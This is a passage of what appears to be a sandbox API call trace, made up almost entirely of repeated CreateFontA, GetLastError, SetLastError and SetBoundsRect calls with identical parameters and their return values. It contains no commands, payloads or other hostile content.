bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xd0a06f1 [0037.356] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x100a06f2 [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x120a07b9 [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xb0a06f0 [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x300a0804 [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x150a07c6 [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x220a07f4 [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x220a081c [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1a0a07e2 [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.357] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x100a083b [0037.357] GetLastError () returned 0x715 [0037.357] SetLastError (dwErrCode=0x715) [0037.357] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x180a07f3 [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1a0a0821 [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x230a0225 [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x2e0a0800 [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x570a07ef [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x140a0826 [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x110a027b [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1a0a07ee [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x6d0a07d0 [0037.358] GetLastError () returned 0x715 [0037.358] SetLastError (dwErrCode=0x715) [0037.358] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.358] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x190a0711 [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x190a070a [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1b0a070e [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1b0a0708 [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1e0a0155 [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x160a070f [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xe0a0706 [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1b0a070d [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x270a0152 [0037.359] GetLastError () returned 0x715 [0037.359] SetLastError (dwErrCode=0x715) [0037.359] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.359] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a0713 [0037.359] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x3a0a0850 [0037.360] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x40a0854 [0037.360] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a0840 [0037.360] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xc0a071d [0037.360] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x30a0851 [0037.360] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x30a084f [0037.360] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a071b [0037.360] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xa0a0716 [0037.360] GetLastError () returned 0x715 [0037.360] SetLastError (dwErrCode=0x715) [0037.360] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.360] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x140a06f6 [0037.360] GetLastError () returned 0x715 [0037.361] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.361] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x60a0704 [0037.361] GetLastError () returned 0x715 [0037.361] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.361] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a0702 [0037.361] GetLastError () returned 0x715 [0037.361] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.361] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x40a0703 [0037.361] GetLastError () returned 0x715 [0037.361] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.361] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xd0a06f8 [0037.361] GetLastError () returned 0x715 [0037.361] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.361] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x40a06f9 [0037.361] GetLastError () returned 0x715 [0037.361] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.361] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x120a06f5 [0037.361] GetLastError () returned 0x715 [0037.361] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.361] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xb0a06f7 [0037.361] GetLastError () returned 0x715 [0037.361] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.361] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1b0a06f4 [0037.361] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x620a07f6 [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1d0a07d9 [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1f0a082a [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x610a01c8 [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x390a027c [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x290a0805 [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1b0a0793 [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a071a [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a0715 [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.362] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a0714 [0037.362] GetLastError () returned 0x715 [0037.362] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x100a0707 [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1b0a0709 [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1a0a0705 [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a083d [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a083e [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x50a083c [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x70a083a [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xb0a0725 [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, 